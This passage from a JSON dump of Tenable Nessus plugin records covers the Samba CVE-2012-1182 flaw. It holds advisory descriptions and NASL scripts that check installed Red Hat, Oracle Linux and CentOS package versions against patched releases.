(C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0465\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", 
reference:\"libsmbclient-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"libsmbclient-devel-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"libsmbclient-devel-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-client-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", reference:\"samba-common-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", reference:\"samba-common-3.0.33-3.39.el5_8\")) flag++; }\n\nif 
(sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\nif (sp == \"6\") { if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.29.el5_6.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba-swat-3.0.33-3.39.el5_8\")) flag++; }\n\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"libsmbclient-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"libsmbclient-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", 
reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-client-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-common-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-common-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-debuginfo-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-debuginfo-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-doc-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-doc-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if 
(rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-swat-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-swat-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", 
reference:\"samba-winbind-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-clients-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-clients-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", reference:\"samba-winbind-devel-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", reference:\"samba-winbind-devel-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\nif (sp == \"1\") { if (rpm_check(release:\"RHEL6\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.6-86.el6_1.5\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.5.10-115.el6_2\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:53:33", "description": "Description of 
changes:\n\n[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 4 : samba (ELSA-2012-0478)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba-common", "p-cpe:/a:oracle:linux:samba-swat", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2012-0478.NASL", "href": "https://www.tenable.com/plugins/nessus/68512", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2012-0478.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68512);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n\n script_name(english:\"Oracle Linux 4 : samba (ELSA-2012-0478)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002755.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"samba-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-client-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-common-3.0.33-3.36.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"samba-swat-3.0.33-3.36.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba / 
samba-client / samba-common / samba-swat\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:44", "description": "Updated samba3x packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could send a specially crafted RPC request that would cause the Samba daemon (smbd) to crash or, possibly, execute arbitrary code with the privileges of the root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which contain a backported patch to resolve this issue. 
After installing this update, the smb service will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "CentOS 5 : samba3x (CESA-2012:0466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba3x", "p-cpe:/a:centos:centos:samba3x-client", "p-cpe:/a:centos:centos:samba3x-common", "p-cpe:/a:centos:centos:samba3x-doc", "p-cpe:/a:centos:centos:samba3x-domainjoin-gui", "p-cpe:/a:centos:centos:samba3x-swat", "p-cpe:/a:centos:centos:samba3x-winbind", "p-cpe:/a:centos:centos:samba3x-winbind-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2012-0466.NASL", "href": "https://www.tenable.com/plugins/nessus/58664", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0466 and \n# CentOS Errata and Security Advisory 2012:0466 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58664);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0466\");\n\n script_name(english:\"CentOS 5 : samba3x (CESA-2012:0466)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5 and Red Hat Enterprise Linux 5.6\nExtended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf7e1c06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba3x packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 
value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : 
rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-doc / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:44", "description": "Updated samba packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6; Red Hat Enterprise Linux 5.3 Long Life; and Red Hat Enterprise Linux 5.6, 6.0 and 6.1 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls, resulted in multiple buffer overflows in Samba. A remote, unauthenticated attacker could 